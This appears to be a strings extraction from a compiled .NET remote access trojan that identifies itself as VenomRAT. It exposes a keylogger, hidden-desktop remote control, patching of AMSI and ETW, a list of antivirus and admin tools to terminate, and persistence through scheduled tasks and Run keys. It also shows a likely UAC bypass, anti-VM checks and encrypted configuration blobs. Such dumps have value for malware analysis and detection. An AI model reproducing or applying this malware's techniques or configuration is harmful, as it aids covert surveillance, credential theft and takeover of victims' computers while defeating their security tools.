!This program cannot be run in DOS mode.
`.rsrc
@.reloc
<jX(!
jX jX(!
jX $jX(!
YZjX(!
<jX(!
jX jX(!
jX $jX(!
YZjX(!
i YoM
i YoM
v4.0.30319
#Strings
.$!$9$g
Action`10
InvalidParameter10
D84F4C120005F1837DC65C04181F3DA9466B123FC369C359A301BABC12061570
<>9__0_0
<Main>b__0_0
<>9__3_0
<Run>b__3_0
<>c__DisplayClass5_0
<>c__DisplayClass6_0
<PatchMem>b__0
<GetFiltes>b__0
<>p__0
AbandonedWait0
InvalidParameter11
<>p__1
IEnumerable`1
CallSite`1
List`1
InvalidParameter1
AbandonedWait1
InvalidParameter12
PROCESSENTRY32
Microsoft.Win32
ToUInt32
ReadInt32
ToInt32
SwapInt32
Func`2
X509Certificate2
InvalidParameter2
AbandonedWait2
<>o__53
AbandonedWait63
Func`3
InvalidParameter3
AbandonedWait3
E123F60E9FC6E974D1381F2F15FB19E7960628CC8925D65E344C2F2BDC64F424
WriteUInt64
ToUInt64
GetAsUInt64
SetAsUInt64
ToInt64
SwapInt64
Action`4
InvalidParameter4
__StaticArrayInitTypeSize=5
CABAFE20CFEA6C92D3377C14650461E190857D48D13934B5562233C314AAFBB5
InvalidParameter5
InvalidImageWin16
ToUInt16
ReadInt16
ToInt16
SwapInt16
HMACSHA256
Aes256
aes256
__StaticArrayInitTypeSize=6
InvalidParameter6
InvalidParameter7
get_UTF8
InvalidParameter8
InvalidParameter9
<Module>
MessagePackLib.<PrivateImplementationDetails>
0C50C67E839472CD612D6033109F5E032987E48E367247F29C0EB30A1D3EB5FC
StopHVNC
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
GetTypeFromCLSID
th32ModuleID
_hookID
th32DefaultHeapID
th32ProcessID
th32ParentProcessID
get_FormatID
HVNC_REPLY_MESSAGE
EXECUTION_STATE
87639126EA77B358F26532367DBA67C5310EF50A8D9888ED070CD40E1F605A8F
get_ASCII
WHKEYBOARDLL
GetRAM
WM_KEYDOWN
LASTINPUTINFO
System.IO
HVNC_REPLY_BMP
IsServerOS
ES_CONTINUOUS
NTSTATUS
GetGPU
get_IV
set_IV
GenerateIV
PatchETW
value__
Camera
havecamera
NotMappedData
ReadServertData
PropertyData
NoTxfMetadata
PagefileQuota
mscorlib
ProcessInJob
ProcessNotInJob
DifferenceAtDc
BadInitialPc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
LowLevelKeyboardProc
KernelApc
UserApc
dwThreadId
GetWindowThreadProcessId
lpdwProcessId
processId
GetProcessById
ObjectPathSyntaxBad
EndRead
BeginRead
idThread
BlockThread
InnerAdd
RecoveryNotNeeded
PagefileQuotaExceeded
ArrayBoundsExceeded
SemaphoreLimitExceeded
SuspendCountExceeded
ThreadWasSuspended
SectionNotExtended
b64encoded
SHA256Managed
AccessDenied
RangeNotLocked
get_Enabled
set_Enabled
get_isEnabled
set_isEnabled
ServerDisabled
AccountDisabled
ServerNotDisabled
TimerNotCanceled
RequestCanceled
IoPrivilegeFailed
LogGrowthFailed
TransactionPropagationFailed
TmInitializationFailed
PrimaryTransportConnectFailed
Cancelled
FileRenamed
NotAllAssigned
TransactionNotJoined
Abandoned
ProcessCloned
MutantNotOwned
NoneMapped
SomeNotMapped
ProfilingNotStopped
RegistryRecovered
PasswordExpired
RollbackTimerExpired
FormsAuthRequired
SynchronizationRequired
CheckOutRequired
FileForcedClosed
FileClosed
HandlesClosed
PortClosed
PortConnectionRefused
VirusInfected
get_Connected
PipeConnected
get_IsConnected
set_IsConnected
PipeDisconnected
RmDisconnected
LpcReceiveBufferExpected
LogCorruptionDetected
ProcessIsProtected
FileDeleted
VirusDeleted
LockNotGranted
NotImplemented
VolumeMounted
ProfilingNotStarted
RmAlreadyStarted
Alerted
TransactionAlreadyAborted
CtlFileNotSupported
EasNotSupported
TooManyGuidsRequested
TooManyLuidsRequested
TransactionNotRequested
GuidsExhausted
LuidsExhausted
AgentsExhausted
RxActCommitted
NotCommitted
TransactionAlreadyCommitted
Received
TransactionalOpenNotAllowed
LpcRequestsNotAllowed
InvalidCid
InvalidSid
HandleNoLongerValid
StreamMiniversionNotValid
CurrentTransactionNotValid
TransactionRequestNotValid
FileInvalid
ObjectNameInvalid
ObjectPathInvalid
get_Guid
PrivilegeNotHeld
<SendSync>k__BackingField
<Enabled>k__BackingField
<isEnabled>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<ActivatePo_ng>k__BackingField
<Ping>k__BackingField
<Interval>k__BackingField
<interval>k__BackingField
<Buffer>k__BackingField
<filter>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
InnerAddMapChild
InnerAddArrayChild
FloatDenormalOperand
Append
RegistryValueKind
ResourceDataNotFound
ResourceNameNotFound
ObjectNameNotFound
ResourceTypeNotFound
ProcedureNotFound
ObjectPathNotFound
OrdinalNotFound
DllNotFound
CrmProtocolNotFound
StreamMiniversionNotFound
EntryPointNotFound
method
IllFormedPassword
WrongPassword
Replace
IsNullOrWhiteSpace
get_StackTrace
NotSameDevice
NoSuchDevice
NoMediaInDevice
CreateInstance
get_Source
source
vkCode
wScanCode
exitCode
keyCode
set_Mode
InvalidReadMode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
decode
utf8Encode
DeleteSubKeyTree
PageFaultGuardPage
SectionNotImage
BindToStorage
LpcInvalidConnectionUsage
cntUsage
get_Message
InvalidMessage
NoSuchPrivilege
WorkingSetLimitRange
EaTooLarge
FileTooLarge
DynamicAPIInvoke
DynamicInvoke
EndInvoke
BeginInvoke
DynamicFunctionInvoke
InstanceNotAvailable
PipeNotAvailable
IEnumerable
IDisposable
ToDouble
SwapDouble
InvalidHandle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
dwProcessHandle
WaitHandle
bInheritHandle
InvalidPortHandle
get_MainWindowHandle
handle
WriteSingle
ToSingle
SetAsSingle
Install_File
szExeFile
EndOfFile
KeylogConfFile
PageFaultPagingFile
NoSuchFile
LoadFromFile
DecodeFromFile
NoEasOnFile
SaveToFile
SaveBytesToFile
TmVolatile
IsInRole
WindowsBuiltInRole
Console
GetActiveWindowTitle
PrevActiveWindowTitle
get_MainWindowTitle
wintitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
DLLName
GetCPUName
get_Name
InvalidEaName
get_FileName
set_FileName
OfflineSaveFileName
OnlineSaveFileName
GetTempFileName
GetFileName
fileName
get_ModuleName
lpModuleName
get_MachineName
get_OSFullName
get_FullName
IsValidDomainName
FunctionName
PropName
get_UserName
InvalidComputerName
lowerName
get_ProcessName
GetActiveProcessName
SetName
InvalidAccountName
ExportName
CheckHostName
GetProcessesByName
DateTime
get_LastWriteTime
ToUniversalTime
dwTime
WrongVolume
WriteLine
get_NewLine
Combine
LocalMachine
ManagementScope
ComInterfaceType
BadFileType
UriHostNameType
FunctionDelegateType
get_ValueType
valueType
OfType
MsgPackType
SecurityProtocolType
uMapType
GetType
SocketType
ClientType
FileShare
Compare
System.Core
DInvokeCore
DllMightBeInsecure
LogonFailure
Server_signa_ture
ResourceInUse
TokenAlreadyInUse
ModuleBase
ReadOnlyCollectionBase
pcPriClassBase
ImageNotAtBase
Dispose
Reparse
DataLate
Certifi_cate
X509Certificate
Server_Certificate
certificate
Create
MulticastDelegate
NothingToTerminate
GetKeyboardState
InvalidPipeState
SetThreadExecutionState
lpKeyState
GetKeyState
CannotDelete
CallSite
PageFaultCopyOnWrite
TransactedMappingUnsupportedRemote
TransactionsUnsupportedRemote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
InterfaceTypeAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
UnmanagedFunctionPointerAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
get_Value
DeleteValue
innerValue
GetValue
SetValue
set_Expect100Continue
get_KeepAlive
set_KeepAlive
RmNotActive
TransactionNotActive
DebuggerInactive
Remove
Client.exe
get_Size
cbSize
LogResizeInvalidSize
set_BlockSize
get_TotalSize
RegionSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
dwSize
set_KeySize
SizeOf
IndexOf
cchBuff
pwszBuff
CantTerminateSelf
IID_IPropertyBag
strFlag
SectionTooBig
CryptoConfig
get_ActivatePo_ng
set_ActivatePo_ng
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
DeletePending
UTF8Encoding
System.Drawing.Imaging
Ceiling
PipeListening
System.Runtime.Versioning
Warning
FromBase64String
ToBase64String
ReadString
DownloadString
WriteString
ToString
get_AsString
set_AsString
BytesAsString
GetAsString
SetAsString
GetString
BytesAsHexString
KeylogMutexString
Substring
PipeClosing
ThreadIsTerminating
ProcessIsTerminating
ClearSetting
System.Drawing
SendLog
CouldNotResizeLog
ErrorLog
set_ErrorDialog
ObjectTypeMismatch
InfoLengthMismatch
RevisionMismatch
RemoteFileVersionMismatch
x64_am_si_patch
x86_am_si_patch
x64_etw_patch
x86_etw_patch
RecursiveDispatch
ComputeHash
ComputeStringHash
VerifyHash
get_ExecutablePath
GetTempPath
GetFolderPath
HmacSha256Length
get_Length
IvLength
AuthKeyLength
EndsWith
StartsWith
Patcham_si
PtrToStringAnsi
msgpackObj
listObj
MessagePackLib.MessagePack
MsgPack
AsyncCallback
HookCallback
RemoteCertificateValidationCallback
TimerCallback
callback
unpack_msgpack
BadStack
BadInitialStack
FloatStackCheck
RegistryKeyPermissionCheck
FlushFinalBlock
StopBlock
StartBlock
idHook
SetHook
strVal
RtlSetProcessIsCritical
ProcessCritical
Marshal
NetworkCredential
Normal
Informational
System.Security.Principal
WindowsPrincipal
AreEqual
get_Interval
set_Interval
get_interval
set_interval
InvalidAcl
BadInheritanceAcl
InvalidVolumeLabel
System.ComponentModel
ImpersonationLevel
BufferTooSmall
In_stall
Client.Install
kernel32.dll
user32.dll
ntdll.dll
DiskFull
WriteNull
SetAsNull
set_SecurityProtocol
MutexControl
Unsuccessful
DirectoryNotRm
UnableToFreeVm
Encode2Stream
FileStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
keylogparam
Program
PatchMem
get_Item
get_Is64BitOperatingSystem
Client.Algorithm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
CLSID_SystemDeviceEnum
MsgPackEnum
ICreateDevEnum
WriteBoolean
ToBoolean
GetAsBoolean
SetAsBoolean
HwidGen
NoImpersonationToken
NoToken
CantRecoverWithHandleOpen
children
TransactionsNotFrozen
X509Chain
AppDomain
get_CurrentDomain
Paste_bin
IsAdmin
LastAdmin
Ver_sion
ObjectNameCollision
UnknownRevision
GetFileNameWithoutExtension
get_OSVersion
NoSuchLogonSession
System.IO.Compression
Application
System.Security.Authentication
GuardPageViolation
SharingViolation
AccessViolation
set_Impersonation
FloatInvalidOperation
InvalidWorkstation
MiniversionInaccessibleFromSpecifiedTransaction
InvalidTransaction
EfsNotAllowedInTransaction
CannotExecuteFileInTransaction
UnableToDeleteSection
System.Reflection
PropertyDataCollection
ProcessModuleCollection
X509CertificateCollection
ManagementObjectCollection
Client.Connection
InvalidPageProtection
SectionProtection
PasswordRestriction
AccountRestriction
IllegalFunction
function
PrivilegedInstruction
IllegalInstruction
PageFaultTransition
set_Position
position
CallingConvention
TransactionRequiredPromotion
CryptographicException
DllNotFoundException
MissingMethodException
NonContinuableException
ArgumentNullException
InvalidOperationException
get_InnerException
ManagementException
ArgumentException
StringComparison
DataOverrun
Unknown
CGRInfo
ImageCodecInfo
SendInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
DirectoryInfo
PageFaultDemandZero
MappedFileSizeZero
IntegerDivideByZero
FloatDivideByZero
IncompatibleFileMap
WriteMap
PreventSleep
SingleStep
CrashDump
LongJump
currentApp
Microsoft.CSharp
NotifyCleanup
NoSuchGroup
SpecialGroup
MemberInGroup
MemberNotInGroup
InvalidPrimaryGroup
MembersPrimaryGroup
NormalStartup
System.Linq
InvalidSecurityDescr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Install_Folder
SpecialFolder
IdSender
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
GetEncoder
get_Buffer
set_Buffer
TransactionInvalidMarshallBuffer
ServicePointManager
WriteInteger
get_AsInteger
set_AsInteger
GetAsInteger
SetAsInteger
Logger
Keylogger
ManagementObjectSearcher
IMoniker
IEnumMoniker
ppEnumMoniker
moniker
SessionEndingEventHandler
InvalidOwner
Client.Helper
isVM_by_wim_temper
ToUpper
NoSuchUser
SpecialUser
CurrentUser
InvalidParameter
StreamWriter
TextWriter
get_filter
set_filter
GetDelegateForFunctionPointer
BitConverter
ValidateVenomServer
LogonServer
ToLower
NotifyEnumDir
EnlistmentNotSuperior
DataError
CrcError
InPageError
InternalError
EaCorruptError
IEnumerator
CreateClassEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
cntThreads
TooManyThreads
NativeMethods
Microsoft.VisualBasic.Devices
FindDevices
System.Runtime.InteropServices
System.Runtime.CompilerServices
InsufficientResources
DebuggingModes
set_EnablePrivileges
Matches
NoMoreEntries
get_Properties
ExpandEnvironmentVariables
TooManyOpenedFiles
NoMoreFiles
TooManyPagingFiles
get_Modules
GetSubKeyNames
System.Runtime.InteropServices.ComTypes
PacketTypes
GetProcesses
ConflictingAddresses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Delegates
GetFiltes
Encode2Bytes
GetUtf8Bytes
utf8Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetAsBytes
SetAsBytes
GetBytes
rawBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
esFlags
dwFlags
InitializeSettings
SessionEndingEventArgs
Anti_Analysis
RunAntiAnalysis
ICredentials
set_Credentials
Equals
SslProtocols
ReadTools
WriteTools
BytesTools
KeylogParams
System.Windows.Forms
Contains
CantCreateMoreStreamMiniversions
GetInstalledApplications
System.Collections
ConnectionOptions
StringSplitOptions
get_Chars
RemoveLastChars
FileLockedWithOnlyReaders
GetImageDecoders
EnumMonikers
RuntimeHelpers
Parameters
FileLockedWithWriters
get_filters
NoLogonServers
SslPolicyErrors
sslPolicyErrors
InvalidLogonHours
InvalidInfoClass
CallbackBypass
dwDesiredAccess
FileAccess
Success
Anti_Process
TerminateProcess
AntiProcess
KillProcess
ThreadNotInProcess
OpenProcess
GetCurrentProcess
IPAddress
InvalidAddress
GetLoadedModuleAddress
get_BaseAddress
GetExportAddress
GetLibraryAddress
OpLockBreakInProgress
Compress
Decompress
Por_ts
Hos_ts
System.Net.Sockets
set_Arguments
SystemEvents
ObjectNameExists
GroupExists
ObjectNoLongerExists
UserExists
TransactionSuperiorExists
CrmProtocolAlreadyExists
Antivirus
MaximumNtStatus
Concat
InvalidImageLeFormat
InvalidImageFormat
format
WriteFloat
get_AsFloat
set_AsFloat
GetAsFloat
SetAsFloat
FindObject
ManagementBaseObject
ReparseObject
ForcePathObject
ReleaseComObject
ManagementObject
object
Collect
Connect
Reconnect
OldProtect
InvalidImageProtect
NewProtect
FileLockConflict
TransactionalConflict
System.Net
TransactionScopeCallbacksNotSet
PortNotSet
PortAlreadySet
Target
target
KeepAlivePacket
ClientSocket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
CantWait
op_Explicit
set_DefaultConnectionLimit
BadWorkingSetLimit
CommitmentLimit
ControlCExit
ClientOnExit
WaitForExit
get_Default
FirstOrDefault
IAsyncResult
FloatInexactResult
result
WebClient
InitializeClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
DatatypeMisalignment
Environment
Component
parent
System.Collections.IEnumerator.Current
System.Collections.IEnumerator.get_Current
GetCurrent
TxfMetadataAlreadyPresent
CantOpenMiniversionWithModifyIntent
get_content
set_content
EaListInconsistent
FileIdentityNotPersistent
get_RemoteEndPoint
Breakpoint
get_Count
get_ProcessorCount
SpecialAccount
NoQuotasForAccount
amount
CreateToolhelp32Snapshot
hSnapshot
GetPathRoot
RmMetadataCorrupt
TxfAttributeCorrupt
Decrypt
Encrypt
ParameterizedThreadStart
Convert
FailFast
InvalidDeviceRequest
ToList
GetUserProcessList
IndoubtTransactionsExist
MessageLost
Process32First
FileCheckedOut
IoTimeout
GetKeyboardLayout
Process32Next
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
AppendAllText
GetWindowText
NotMappedView
get_Now
GetForegroundWindow
set_CreateNoWindow
FilterProcessWindow
FloatUnderflow
BufferOverflow
IntegerOverflow
FloatOverflow
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
CloseMutex
CreateMutex
InvalidParameterMix
IBindCtx
De_lay
WirteArray
InitializeArray
MsgPackArray
ToArray
get_AsArray
refAsArray
CantBreakTransactionalDependency
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
_authKey
MapVirtualKey
masterKey
wVirtKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
PartialCopy
CantCrossRmBoundary
WriteBinary
ToBinary
library
ObjectQuery
SelectQuery
CLSID_VideoInputDeviceCategory
category
NtProtectVirtualMemory
NoMemory
CantDisableMandatory
CreateDirectory
get_SystemDirectory
NonExistentEaEntry
SetRegistry
InitRegistry
DeviceBusy
PipeBusy
op_Equality
op_Inequality
InvalidSubAuthority
InvalidIdAuthority
System.Net.Security
WindowsIdentity
PipeEmpty
IsNullOrEmpty
TxfDirNotEmpty
VolumeDirty
InvalidImageNotMz
'vCusE
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
ControlThread
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
$29840822-5B84-11D0-BD3B-00A0C911CE86
$55272A00-42CB-11CE-8135-00AA004BB851
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.7.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
<dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">PerMonitorV2, PerMonitor</dpiAwareness>
<longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
! &%'%32a
MyData
DataLogs.conf
DataLogs_keylog_offline.txt
DataLogs_keylog_online.txt
Select * from Win32_Processor
{0} ({1} Core)
NumberOfCores
Select * From Win32_ComputerSystem
TotalPhysicalMemory
select * from Win32_VideoController
{0} v{1}
DriverVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
UninstallString
InstallLocation
msiexec.exe
Pac_ket
keyLogger
[Enter]
----- [
MM-dd HH:mm:ss
cvtres
C://Temp//1.log
SHA256
Fj4P086Qmu1a6FZSk4k6JrsESwiQ4X8GufsdHrA+RA/BFQ2dbhOepraex9mrY9pHmwEbw9ITKRpPn93b0AjP5A==
hxzATLV0Yo79UeaxbtPaRpteyg26HvWSxfnpctOAzbHkLvfw9BnRCASudiplOjxdIDE3QxFmBe/3HkN4NWyUQg==
3CBBP54QJHBWYFsXZZRpnxX0wnerencU0RROhzKSVqcTdFbaa8RnXeEWsgLjlwEWlglXPCRxqHTLM4o8wpp/jotfiDlhLiCTFEzIIYErDQ+wsXe/vKRxyZqCta/ZX6Xs
LrHllTi20eE7t9fuT/LAJZQ2i5NKQSnAT9E4NQl4wPTVhAMHJ2QZ/Njoo2LkSqzRStY0lMpHBgntCnVSyyQqbw==
%AppData%
RXJUNU85MmpIN2VCaUlEdks2YzFWSWVtaUQyRno1MUM=
Ws/odZk+9ei6O+Mxppt8+Ik5OyFK80XWgNJN04rJzEma5IqfLigstW652bid1at5NTOV9mDph28f86O+JOosv/gNplSLrwLnvgQN9bc1c0E=
AQ/4LlKJiRYGKiOLvaxlTfE4xHN7N94cQ8ZcdWNvIUi0unupt4T25Va51EhBap/ejHyD66cL3cmL4o5/uXZqv0l8JfAiYLJunnCg653HY39R389nHZmZnbuilsJMosVyp0WuU4HLet36nppCvp+dplyXo+c8r6Dl1nQWcQ0edqLQ6/BzLg6ujXWgot6SLoIrMdDbX94KmDMEG7ZToqOQfFmR/hGmC92P9og+dH+WvHjNjVbQ/cWOud2hUoXsuzNkNmps/K26HuIlpuNTVxt4u08iruIJ7ZCqd+qmNPnUQ5DB5kqlRwpiqqSGTwJkljTi+xy+dU6BzNT5xmVaNeJV5G3+JAtgXhG0Jsn05dmJTdvUKckums5D32PxP4a7jf8spf/K5o3qAfgAGHDKD6DMwqdgV+XkhlJ19srNvGbxZOu6JPvRP4Oj8B4l/4gVM4nOxozGxXOa/R34sq5eUPG9MLpzFgDHYZ+3z+8+4btmIhL+aQuEW4IkCygf/oJTNz5jePfTBmkvmL+ORnVGaUJyt3kExU/v0th997xDiIEtj+sOBg5E2Mr+QU19lS+s+1pY8jm0tVK6Blhe8g1EuC70gStFLEMjFMKcjMY/8QoMyDo51QgJolWuhVgddWajgOdU2GCI5y8tnLv7FGYXecoNi14Z9NaKpQCfLCjD2MY2gcxVbHKAR6sJt7RLV6cWhE27a3IxoCIu+yGBrvzVjQ5MuSZgGQOw6AKX/YUfSr3ErC/aZEw8HI431kMBG+RgH1GDA1IybfkxI/RYBqu1ng3a+38GBe9pcFLA1jnDx7dVs+Cu6u4O6yr8CDU9a9EZP6LCnjNQm1ZBCK3LAv1DsPajYje6zbDfoq+jA8uc1R3va8dRYAx78qEpFb5COHiZAKsX9Jft6UZhK/280v8cYUhAIsZBjrGu/kSNz/m4ob+KZqXyuDlv5TrrZSDP50//dTn3bNQ73LMddMPsyvK707hr/2PWbho366OkrNYWmRRJfdxK4Hn+Vzgn71v/OfTMbYii
wza4YtT66Ko9P3Fn2wK+GTzSFyLYGRZ6m7QbzlsRz9ZNMRnHSExQJWtoSBVBBjQasgiFfXH2v0Vrkzi7td5MqhIQvNWbFleTKZdJYXiDnOklGMNoc6UhjpDNCYoojHaro2oN6TSjeCodAxLas85HBWnKpqtz+wj2rrIx3bGQUuJ+G7IhtfPja4bbFYttSaeE5Be2KfufFgfV3UTQhTzHAQiX8iNMKlvKyW1kW/SSG2XfgASUyOHOUxSBpnHHulUsU1u16cmNmPZhVNve0IFXX7bx8bHNfQVWvFXSmIgLA0c=
9pSMA8gL+qdDH3UTFOa1k0G+QVfoRr5pvMS4y7CUOnVTTljMi+ShFUBfGo/yqMzOd08Bzv5qdxw7Z+tF7EDQeA==
yaLPzAR9TDswmnVrkUsj5xrnsz9c1WJwJoXsSgJ0gT7Xs0UDR2kUAxFLOre1eteHjIhrUey9lgKIPHGqAbYiBw==
YIcO2en7611r1gsjFlJcFtVomI3SEwUxIQvJ4addgfXPIgcNoG+6wD56tcD7gvbUxdJlH5/YruTfyi25nknuPQ==
Iz3ArVkoPahHPUr3aa//x5rvsssfFE68pioON0S26Ze5JZEE8KyuraSrohZtVFjv5HVp0jvP8YGkccTv7qpGfw==
jEAuFIpNOS6egAXQL+dmFftbre85Zizrqzpl7B/FGJxXcM0NbQ44OCIJYt3jnUmSfDHoQ7aIh7hQAbqWjf+lkw==
Message
init_reg
loadofflinelog
plu_gin
save_Plugin
HVNCStop
keylogsetting
runningapp
filterinfo
OfflineKeylog sending....
offlinelog
sendPlugin
Hashes
running
Plugin.Plugin
Msgpack
UmVjZWl2ZWQ=
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
@echo off
timeout 3 > NUL
START "" "
" /f /q
Install Failed :
Taskmgr.exe
ProcessHacker.exe
procexp.exe
MSASCui.exe
MsMpEng.exe
MpUXSrv.exe
MpCmdRun.exe
NisSrv.exe
ConfigSecurityPolicy.exe
MSConfig.exe
Regedit.exe
UserAccountControlSettings.exe
taskkill.exe
\\{0}\root\CIMV2
SELECT * FROM Win32_OperatingSystem
ProductType
Select * from Win32_CacheMemory
{860BB310-5D01-11d0-BD3B-00A0C911CE86}
{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
{55272A00-42CB-11CE-8135-00AA004BB851}
FriendlyName
Err HWID
ClientInfo
ClientType
Normal
DesktopName
Microsoft
Camera
Version
Perfor_mance
Paste_bin
Anti_virus
Install_ed
C:\Temp\client.log
C:\Temp\client_ex.log
: ex
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Unknown
Environment
windir
Software
Classes
mscfile
ms-settings
, Dll was not found or not loaded.
Failed to parse module exports.
, export not found.
Could not get the handle for the function.
ntdll.dll
NtProtectVirtualMemory
not found.
[!] {0}
YW1zaS5kbGw=
AmsiScanBuffer
EtwEventWrite
Software\
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
VenomRATByVenom
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
OfflineKeylogger
Normal
HVNC_REPLY_MESSAGE
HVNC_REPLY_CMP
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
InternalName
ClientAny.exe
LegalCopyright
LegalTrademarks
OriginalFilename
ClientAny.exe
ProductName
ProductVersion
Assembly Version
6.0.1.0